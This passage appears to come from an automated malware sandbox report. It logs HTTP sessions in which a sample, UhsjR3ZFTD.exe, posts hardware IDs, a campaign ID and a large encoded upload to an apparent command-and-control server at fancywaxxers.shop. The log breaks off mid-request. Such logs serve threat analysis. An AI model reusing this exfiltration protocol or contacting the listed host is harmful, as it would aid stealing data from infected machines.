                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=DnXRq4OsX%2FX44q7NhcMPY4p06jRBNgrPIS6qbvXoFpSFufSf%2BTGcSsmPrJI5x0BCigtXXaWno%2FfhRRJ3ZOgxlp7N9q%2FCL4%2BC7J2HjZFl8O13DAv%2BKykEPVETPddlc1R7ut2YQA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8fb5770e0835c327-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1659&min_rtt=1655&rtt_var=630&sent=10&recv=19&lost=0&retrans=0&sent_bytes=2842&recv_bytes=16025&delivery_rate=1723730&cwnd=189&unsent_bytes=0&cid=b0e9fa8025633fb5&ts=495&x=0"
                                                                                                        2025-01-01 21:05:01 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2025-01-01 21:05:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        4192.168.2.649717104.21.32.14433960C:\Users\user\Desktop\UhsjR3ZFTD.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-01 21:05:02 UTC277OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=XF7EXX2N03UI
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 19927
                                                                                                        Host: fancywaxxers.shop
                                                                                                        2025-01-01 21:05:02 UTC15331OUTData Raw: 2d 2d 58 46 37 45 58 58 32 4e 30 33 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 45 43 39 38 46 35 46 43 44 34 46 39 43 42 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 58 46 37 45 58 58 32 4e 30 33 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 58 46 37 45 58 58 32 4e 30 33 55 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 76 38 36 50 47 2d 2d 55 7a 65 52 52 0d 0a 2d 2d 58 46 37 45 58 58 32 4e 30 33 55 49 0d 0a
                                                                                                        Data Ascii: --XF7EXX2N03UIContent-Disposition: form-data; name="hwid"6EEC98F5FCD4F9CB20A4C476FD51BCB1--XF7EXX2N03UIContent-Disposition: form-data; name="pid"3--XF7EXX2N03UIContent-Disposition: form-data; name="lid"Zv86PG--UzeRR--XF7EXX2N03UI
                                                                                                        2025-01-01 21:05:02 UTC4596OUTData Raw: 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8b 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 d1 e8 b0 32 f0 c3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 80 1b 8d 0e 2b 03 3f 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c b8 b1 e8 ef fa 6f c5 82 3f 0c fe 4d 70 35 98 09 ee b9 f1 d3 1b 7f 70 e3 5f de a8 de f8 f4 8d d8 f5 6f 86 49 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                        Data Ascii: +?2+?2+?o?Mp5p_oI
                                                                                                        2025-01-01 21:05:02 UTC1139INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 01 Jan 2025 21:05:02 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=f84amf5osmgnke56bv18vedsst; expires=Sun, 27 Apr 2025 14:51:41 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=flt6bDsTPkwNjIZy8JVx%2BpXz05YJqr5GJorImfJMeB3NVCE6yHo5uRtWY1qI2zA9Q1XeMVuALlTr5sk%2B%2FZrwxWxENLwxujaNLGSGpypa09cYh%2BiwJNcq%2Flqvjx%2FmDFzWmblV4g%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8fb577153c4b1875-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1595&min_rtt=1590&rtt_var=607&sent=11&recv=25&lost=0&retrans=0&sent_bytes=2843&recv_bytes=20884&delivery_rate=1784841&cwnd=153&unsent_bytes=0&cid=255c8a926915fb4d&ts=586&x=0"
                                                                                                        2025-01-01 21:05:02 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2025-01-01 21:05:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        5192.168.2.649718104.21.32.14433960C:\Users\user\Desktop\UhsjR3ZFTD.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-01 21:05:04 UTC272OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=WZ9VX7QJ
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 1185
                                                                                                        Host: fancywaxxers.shop
                                                                                                        2025-01-01 21:05:04 UTC1185OUTData Raw: 2d 2d 57 5a 39 56 58 37 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 45 43 39 38 46 35 46 43 44 34 46 39 43 42 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 57 5a 39 56 58 37 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 57 5a 39 56 58 37 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 76 38 36 50 47 2d 2d 55 7a 65 52 52 0d 0a 2d 2d 57 5a 39 56 58 37 51 4a 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74
                                                                                                        Data Ascii: --WZ9VX7QJContent-Disposition: form-data; name="hwid"6EEC98F5FCD4F9CB20A4C476FD51BCB1--WZ9VX7QJContent-Disposition: form-data; name="pid"1--WZ9VX7QJContent-Disposition: form-data; name="lid"Zv86PG--UzeRR--WZ9VX7QJContent-Disposit
                                                                                                        2025-01-01 21:05:04 UTC1132INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 01 Jan 2025 21:05:04 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=h4pt8usqr3b6ka3j0loajhpagi; expires=Sun, 27 Apr 2025 14:51:43 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=thb%2B0Gg36dCQyd1aajaZJvnr%2BlvxaxDQLsI10ijFF7ZkP8DVYG3elnBe4FmFllNQ%2B5iyR1lr5Nagf3TOJf%2BtIOv52ybKgHoFcfdSORwwfxQi4dSUvCf7kLliNkqATuSyyXlWbg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8fb57723782e8cda-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=2056&min_rtt=1899&rtt_var=824&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=2093&delivery_rate=1537651&cwnd=242&unsent_bytes=0&cid=39af8739cf7e0028&ts=442&x=0"
                                                                                                        2025-01-01 21:05:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                        Data Ascii: fok 8.46.123.189
                                                                                                        2025-01-01 21:05:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                        Data Ascii: 0


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        6192.168.2.649720104.21.32.14433960C:\Users\user\Desktop\UhsjR3ZFTD.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-01 21:05:05 UTC278OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: multipart/form-data; boundary=KCJP2GIMZMWW
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 587484
                                                                                                        Host: fancywaxxers.shop
                                                                                                        2025-01-01 21:05:05 UTC15331OUTData Raw: 2d 2d 4b 43 4a 50 32 47 49 4d 5a 4d 57 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 36 45 45 43 39 38 46 35 46 43 44 34 46 39 43 42 32 30 41 34 43 34 37 36 46 44 35 31 42 43 42 31 0d 0a 2d 2d 4b 43 4a 50 32 47 49 4d 5a 4d 57 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4b 43 4a 50 32 47 49 4d 5a 4d 57 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 5a 76 38 36 50 47 2d 2d 55 7a 65 52 52 0d 0a 2d 2d 4b 43 4a 50 32 47 49 4d 5a 4d 57 57 0d 0a
                                                                                                        Data Ascii: --KCJP2GIMZMWWContent-Disposition: form-data; name="hwid"6EEC98F5FCD4F9CB20A4C476FD51BCB1--KCJP2GIMZMWWContent-Disposition: form-data; name="pid"1--KCJP2GIMZMWWContent-Disposition: form-data; name="lid"Zv86PG--UzeRR--KCJP2GIMZMWW
                                                                                                        2025-01-01 21:05:05 UTC15331OUTData Raw: 09 2a 83 81 36 58 38 ac d5 2f 57 01 90 4a bc ab 96 e7 3b 07 e2 be 70 ef a6 fb df b1 3e f2 10 d0 6a 77 bf 8c 13 95 9b a1 9d 60 df 99 40 ff 41 dd 17 9c 24 a0 a2 84 d6 96 ff 37 f0 2d 92 7f f1 82 7d b8 b2 23 51 50 b6 0b 70 f5 39 08 76 3a e7 3c 6a 38 51 ac cb 25 ba fa 93 72 f1 9b f1 66 c6 b2 51 22 a9 cc 0f 79 b6 b7 44 3b f6 a6 6b ef 46 e6 62 41 5a 9c 91 12 3a 0f d5 be 55 34 e5 d5 c5 d3 59 ed a5 fe fc 7f 86 e5 ff 16 63 5e 00 5a fd 8e e0 3e 1a d4 93 c9 3d be 08 18 c6 c1 1c 34 69 fb 94 c0 a0 22 e3 c5 9e 94 62 0e 88 f5 8f 8c fe cb 63 0c 16 5a 46 f9 66 3a c2 89 b9 9c 71 e0 53 53 5b 96 3a 1a 1e 5b a3 e7 a7 42 b5 8f be 1d 1e 04 3c c2 d4 d4 47 ec 7e d1 9c 92 dd ab ad 0c e3 eb 32 ae f8 db 5c 5a ca 2c b8 e6 6e 76 d8 df 9b 0e c2 f4 15 31 93 d4 e4 37 dc f1 77 a8 51 33 96
                                                                                                        Data Ascii: *6X8/WJ;p>jw`@A$7-}#QPp9v:<j8Q%rfQ"yD;kFbAZ:U4Yc^Z>=4i"bcZFf:qSS[:[B<G~2\Z,nv17wQ3
                                                                                                        2025-01-01 21:05:05 UTC15331OUTData Raw: c4 8c 68 be 1a fa 53 42 cc 5c 65 ee 1e de fa 07 62 42 d1 10 d5 20 ac ed 90 82 d0 7f 4d d4 23 66 e6 1a 63 d9 08 59 e7 a1 c0 65 94 61 1f 43 ee e9 17 c8 48 38 56 1f c1 81 f6 c4 a5 2a 6d 98 91 4d 81 63 c2 83 55 4b 31 0c e6 6d c7 4c e1 4f 39 1c b7 cb 2b 53 c5 fd 92 64 a6 d7 7c e3 90 37 71 ca d9 d9 7c 24 d5 65 4a 29 62 bb df 88 97 93 73 f5 4a 21 72 bb b8 f2 50 a4 93 0e 8c 91 c1 05 07 4c 3c 12 f4 94 9f 4e c4 37 fe 4d 32 aa 1a 94 8d 7f e6 2f 8f 48 41 a6 f4 35 1b 7a b7 50 2f 3f c8 3c 7e 03 55 9f 9a d2 45 af 9c bf f4 65 66 f5 d4 e0 a6 e6 ee 8f 21 8f 8e 33 f3 f5 12 77 3d 2a 77 87 16 86 9a af ac fb 88 16 21 39 30 61 d2 eb db 75 b5 41 31 c7 e4 5f d1 da e3 a2 71 d6 8b 41 61 44 27 bd 78 1f 05 ac 87 f9 0d b0 f8 78 7d 34 fb 0d 00 57 db 5e b8 3b 3e fe bf 72 11 6e 45 1c d3
                                                                                                        Data Ascii: hSB\ebB M#fcYeaCH8V*mMcUK1mLO9+Sd|7q|$eJ)bsJ!rPL<N7M2/HA5zP/?<~UEef!3w=*w!90auA1_qAaD'xx}4W^;>rnE
                                                                                                        2025-01-01 21:05:05 UTC15331OUTData Raw: da 24 98 fa fc f2 81 57 bc 52 a8 e6 de c5 67 cf 86 9f f6 14 76 fd 6b ae 88 17 12 0b 71 7a 53 b9 b9 76 ea 48 f4 0b 52 f3 4a d4 b1 53 dc 6f 3c c7 93 27 31 18 00 fd 01 60 3f ed 8a af 49 9d 97 03 55 d2 64 7a b3 8f 05 8c 2f 42 79 1e 17 e9 fc bb fe 6d 28 f0 1b 12 26 fe 99 3f 6e 14 2e a3 54 72 e4 8f 0f cf 26 d9 3f cd 74 03 ea e9 56 01 75 7b ba 44 35 66 b2 56 50 76 ac 4e 9d 6f 06 c0 2e de 1d 0d ab b8 06 23 e1 ab f3 ca 07 4f 72 24 fa d0 ef 5b 7f ee 3e 7d 16 6c 3d f7 dc a0 8f 8b 76 ab 6d 36 77 de 3b 39 10 be a5 75 8c e5 d2 57 fc c8 89 aa a8 3c 17 73 21 88 8b 7c ef df 1f 41 93 e5 18 10 71 83 05 66 04 b9 36 20 df e6 ef e6 7e 29 10 cd 9b 6e c7 81 08 1a 82 48 99 1e 08 4d 34 45 69 4a 15 c6 96 6f b6 ee cb f0 d0 4f 02 e1 a8 55 95 27 0c cb 25 b3 76 69 af b3 e2 6c 00 c3 e5
                                                                                                        Data Ascii: $WRgvkqzSvHRJSo<'1`?IUdz/Bym(&?n.Tr&?tVu{D5fVPvNo.#Or$[>}l=vm6w;9uW<s!|Aqf6 ~)nHM4EiJoOU'%vil
                                                                                                        2025-01-01 21:05:05 UTC15331OUTData Raw: 48 af aa a1 d6 02 d8 6f 81 d9 7a 4e df 2c 04 31 84 80 61 56 6d 3d 60 01 77 51 25 8d db dd 9c e0 0b 5c db 69 a6 48 37 58 13 1b 84 b3 ff 5d 5d d5 a6 13 d1 d2 a7 dc c7 d1 ec 8f c1 b4 3f 88 c3 d5 b5 4f 0c 55 f4 e4 c9 6d 62 1f e3 7f a5 7e 6b bd 8a 21 61 c1 67 8e ba 17 fe 6d fb 86 e6 11 32 10 be 5b 00 65 e9 08 7f 82 7a 9c b4 92 b2 1e 37 b6 6d 7c 8d 76 3d 45 04 ba 3d 67 36 46 43 05 a0 bc 66 16 da 8b 3e 24 1e c7 ba 39 0d 84 b0 b1 ad 6b 59 85 4f e3 0e 35 5f 11 4a 7f 52 40 0a d1 ab d1 d3 ab fe e0 a8 f3 af 3b 0c 90 f2 f5 aa 2a ea ed 5c d9 8f 88 dd cc 49 a4 99 8a 53 8a e7 42 73 09 29 3c 59 ca 50 60 af 61 cb 1c 91 a8 41 d4 3c 43 91 42 68 c5 ec f6 f1 e2 5c 21 96 33 37 07 cc 20 fc e2 c8 56 a8 1a 06 b7 64 92 01 3b 5e 47 86 ee 0c f6 66 87 d0 6c c0 fb 5d 85 e0 e0 a8 c0 b0
                                                                                                        Data Ascii: HozN,1aVm=`wQ%\iH7X]]?OUmb~k!agm2[ez7m|v=E=g6FCf>$9kYO5_JR@;*\ISBs)<YP`aA<CBh\!37 Vd;^Gfl]
                                                                                                        2025-01-01 21:05:05 UTC15331OUTData Raw: 1f 56 5b ff 6b 7b c3 15 f3 56 c5 3a 9b 9e f5 2b a2 fb cc e4 90 f6 43 23 7d 0d cd df 1f 8b 70 49 b8 d6 e3 82 57 24 9c 73 4f 46 be a7 fb f1 dd 96 d1 1c ab 12 c7 5e 06 6e 83 54 55 a1 a7 eb 6f 1a b2 95 1e 92 7f 9a d1 96 52 9f 1e 88 75 5b cc 60 bf 95 01 ac d3 ad 74 d9 ac e1 51 2b ce 84 5b 97 6b 8b 3f d3 6e 46 08 84 aa f1 03 7d 1f e2 43 08 f8 5d e6 12 8b b9 07 08 0f d6 d3 82 ae 17 2f 50 58 69 6e 0b fb 0e 98 67 0b 6d eb f4 15 a9 3c 3d c8 33 f7 00 ea 9a 4c 37 6c 7f f2 63 26 7b ee 8a 63 42 69 25 f7 52 b1 7f 87 4c fb 64 8b 7f 14 71 71 c4 f6 b8 9c 38 f0 6e 35 15 d2 0b e2 c5 94 2d 50 38 39 69 ad 48 76 4b 0f 7b e1 51 54 d0 2f dd b0 00 b2 d3 a7 5d 8d 31 22 a0 59 3c 42 35 80 12 06 36 f1 44 02 9d 40 25 8a 31 67 56 44 24 ed 9e 7a 5e ab dd a7 5e 73 c7 f2 04 4e 2d 5d db 0a
                                                                                                        Data Ascii: V[k{V:+C#}pIW$sOF^nTUoRu[`tQ+[k?nF}C]/PXingm<=3L7lc&{cBi%RLdqq8n5-P89iHvK{QT/]1"Y<B56D@%1gVD$z^^sN-]
                                                                                                        2025-01-01 21:05:05 UTC15331OUTData Raw: 07 bc 13 3f b0 ab be 10 9a 73 11 62 88 72 9e c6 16 a8 2c 25 4d 7a 61 10 e3 10 fd 4b 6e 01 9a 5a 21 7f 17 71 19 b8 c9 85 8a 83 cb b9 39 85 6d 2d 98 eb b4 d8 0a b4 e7 e9 94 76 07 fd 05 ab b1 aa c8 7b d3 d8 4e 29 aa b4 f0 7e d1 df 7d c5 2c 57 fc ba bb 62 26 82 48 34 3c 84 42 40 5b bd 3c 79 00 87 60 67 1f c5 0a e0 83 50 9c 50 38 be d4 53 2f c6 6f 9e 25 04 fa d7 ef ca 55 ab c6 6e 61 78 c4 64 c5 ff 4b 0e 6b 0c 49 e5 6f 94 a2 96 fe ea d1 83 f8 f8 de 08 88 8a da 66 a8 6d 33 60 f9 00 c4 b0 d1 2f 6a de 62 a5 fd c6 fc fd 99 87 87 9a ca 0a c4 69 ca 6c 17 83 14 2d 08 da ee 14 3e 09 74 fe d4 fd 91 67 1f 84 8d fc 46 ff a8 48 40 a5 fa 94 be 34 cd 08 fe 63 c8 50 80 dd f2 63 3f dd 5d b7 21 ac c8 ba f3 19 67 45 ca 6b fd 8c f0 6a d4 b8 e1 50 e7 ce f5 03 13 dd 2f bb 1f 70 6a
                                                                                                        Data Ascii: ?sbr,%MzaKnZ!q9m-v{N)~},Wb&H4<B@[<y`gPP8S/o%UnaxdKkIofm3`/jbil->tgFH@4cPc?]!gEkjP/pj
                                                                                                        2025-01-01 21:05:05 UTC15331OUTData Raw: 66 fe 81 38 7f 52 09 6b f1 1e d7 2c 75 f5 38 2d a6 57 72 64 e0 c5 59 ba f7 09 c6 f5 41 41 6d 4a 40 d4 be 16 da 4a ce c6 00 b6 a0 59 07 01 b3 06 66 04 48 0c 7e b6 32 d6 fe ce af e3 fb de e6 94 7e f2 67 4f 35 0c a7 e4 97 5f 9b e3 5e 25 7e 2a ff 7b 7b cd 52 e1 e2 bd da d8 5e a1 f5 e2 70 36 0b be 9b 68 44 bd 74 d0 7a e9 38 06 d5 30 12 bf 7a b8 8a fe 81 66 06 48 73 12 28 b5 65 97 85 7b a3 39 e0 dc 90 2e 6b f9 6a f5 fb 39 a9 4c c8 70 ae 98 ae b4 e8 82 83 fd 8f 35 2c de 7b bf 1e 06 5b b5 cd 51 1b d6 35 4a e7 65 8a f9 26 9c f5 14 5e 11 38 b1 e6 13 75 25 f3 e2 f0 f1 f5 4f 4a 60 56 66 69 38 ba e5 85 8c 8f 80 f9 69 94 4b 0d 3d 9e 3b 1c 71 f6 a5 e6 70 b5 3a e8 9a f3 d8 50 af 9f a0 1a fc 48 71 de 15 df fd 6c 2e 9d ae 90 f7 99 56 37 29 84 89 5e 0e 29 a2 47 ad 90 40 7c
                                                                                                        Data Ascii: f8Rk,u8-WrdYAAmJ@JYfH~2~gO5_^%~*{{R^p6hDtz80zfHs(e{9.kj9Lp5,{[Q5Je&^8u%OJ`Vfi8iK=;qp:PHql.V7)^)G@|
                                                                                                        2025-01-01 21:05:05 UTC15331OUTData Raw: ef fe 8b a4 96 67 be 0c cd 21 0e 7e 06 67 78 77 43 45 5a 6d 2c 88 a4 2a 1b 5c 6d 70 a3 b9 5b 1c 0b 09 fe de d2 ab 78 c5 f0 eb 47 15 6a 36 d7 a1 ed ee 6c 78 6d e4 c6 97 ad 8e 23 d6 40 eb 01 ac 30 0f b1 7f 88 8d 3c fb 43 56 1f fd 12 9f a9 df a4 08 a6 4e 8a 00 c2 79 99 34 1b 14 4c 41 23 44 22 71 2c 8d f1 cf c1 9f 26 ed ab 9b 3a 0b 99 19 46 c8 90 77 15 fb 50 81 36 58 74 5b ab 19 2d 29 be 4e 4c be 38 6e bc 5b b1 ad 50 ba b9 f2 80 27 87 79 3c 9c 7d 7c bb c8 70 cd e8 75 a2 b4 b2 b0 4b 61 62 04 fa 76 82 9b 2e e9 0c aa b7 52 32 50 f6 aa 39 4f f4 2f 9b dc 70 d0 67 46 4d 5b 7f 72 ba 69 6a 47 31 22 6d 9f 7d 90 3a ed f8 ac c3 03 07 1c 90 15 d6 f3 6e 5a 3a f0 94 be 9c 34 15 08 7e 6e 62 47 91 ad 97 fe 6e ae 45 74 bf a8 1b a5 3e 86 98 ed c9 05 06 dc ce c9 03 a8 b5 24 4a
                                                                                                        Data Ascii: g!~gxwCEZm,*\mp[xGj6lxm#@0<CVNy4LA#D"q,&:FwP6Xt[-)NL8n[P'y<}|puKabv.R2P9O/pgFM[rijG1"m}:nZ:4~nbGnEt>$J
                                                                                                        2025-01-01 21:05:05 UTC15331OUTData Raw: 01 d7 ca c3 80 36 57 c6 09 b5 2d 71 5d 71 b0 34 a4 65 15 8c 36 0d d4 91 d6 99 48 21 89 94 a0 d9 02 d6 fd a3 1d 23 9c 3f dd 09 fa c8 e2 a9 76 b1 e7 11 5a 00 9a a8 46 b2 85 41 ff 7c e5 94 11 8a 95 63 f3 7d 0d fa bf dc 0c 05 b8 a1 58 60 6f 0b 94 1a 15 aa 52 df ff 42 39 35 4e b0 5c 6f ea 31 57 c9 fd 30 30 99 7a 8c 56 da 05 f6 7e 6c 08 ed 50 cd 84 50 81 92 f9 5c ce 6e 6c 2a 3b 54 39 2b 9d 83 94 59 3a b4 a1 f4 68 1f df a0 e0 7e 17 cc e9 1f 1b 61 6a 1b a2 fe 5e cc 9f 02 82 e4 21 83 02 52 4f 42 a5 5c fe fb 44 89 71 57 ec c5 f1 0a b7 bf ef 34 3e 54 cd 0f 4a 15 53 9b e4 07 12 2d 41 62 18 dc a3 0f 64 19 41 bb 35 c1 c9 e3 ca a5 17 28 f1 5b a2 ab ef 5c 70 dc 31 3b d8 4f 89 d4 a7 33 1e 01 72 16 2f a8 3d 44 f9 fb d8 3b 9a ab d7 86 82 df 02 cb 31 80 e8 ed aa f5 fa 57 99
                                                                                                        Data Ascii: 6W-q]q4e6H!#?vZFA|c}X`oRB95N\o1W00zV~lPP\nl*;T9+Y:h~aj^!ROB\DqW4>TJS-AbdA5([\p1;O3r/=D;1W
                                                                                                        2025-01-01 21:05:07 UTC1139INHTTP/1.1 200 OK
                                                                                                        Date: Wed, 01 Jan 2025 21:05:07 GMT
                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                        Transfer-Encoding: chunked
                                                                                                        Connection: close
                                                                                                        Set-Cookie: PHPSESSID=htqkcojb10bfauqdiu791vi2sq; expires=Sun, 27 Apr 2025 14:51:46 GMT; Max-Age=9999999; path=/
                                                                                                        Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                        Cache-Control: no-store, no-cache, must-revalidate
                                                                                                        Pragma: no-cache
                                                                                                        X-Frame-Options: DENY
                                                                                                        X-Content-Type-Options: nosniff
                                                                                                        X-XSS-Protection: 1; mode=block
                                                                                                        cf-cache-status: DYNAMIC
                                                                                                        vary: accept-encoding
                                                                                                        Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7Ydw226eJvmgoHB6hXICJtjIg9NN%2BkmfseCZ%2FgkjWYOj6XTtg3j1Ecn5CqrRC2sczfI81iR7Yv%2FhWZm0HrlUDzPIliKgsSmkWoPiMtIBdo6Fv4FGVVT%2BlaCvtAAruYn10RdjEw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                        NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                        Server: cloudflare
                                                                                                        CF-RAY: 8fb5772c3c368cda-EWR
                                                                                                        alt-svc: h3=":443"; ma=86400
                                                                                                        server-timing: cfL4;desc="?proto=TCP&rtt=1829&min_rtt=1823&rtt_var=697&sent=318&recv=601&lost=0&retrans=0&sent_bytes=2844&recv_bytes=590070&delivery_rate=1555673&cwnd=242&unsent_bytes=0&cid=a504194b56be4be1&ts=1703&x=0"


                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                        7192.168.2.649736104.21.32.14433960C:\Users\user\Desktop\UhsjR3ZFTD.exe
                                                                                                        TimestampBytes transferredDirectionData
                                                                                                        2025-01-01 21:05:08 UTC265OUTPOST /api HTTP/1.1
                                                                                                        Connection: Keep-Alive
                                                                                                        Content-Type: application/x-www-form-urlencoded
                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                        Content-Length: 82
                                                                                                        Host: fancywaxxers.shop
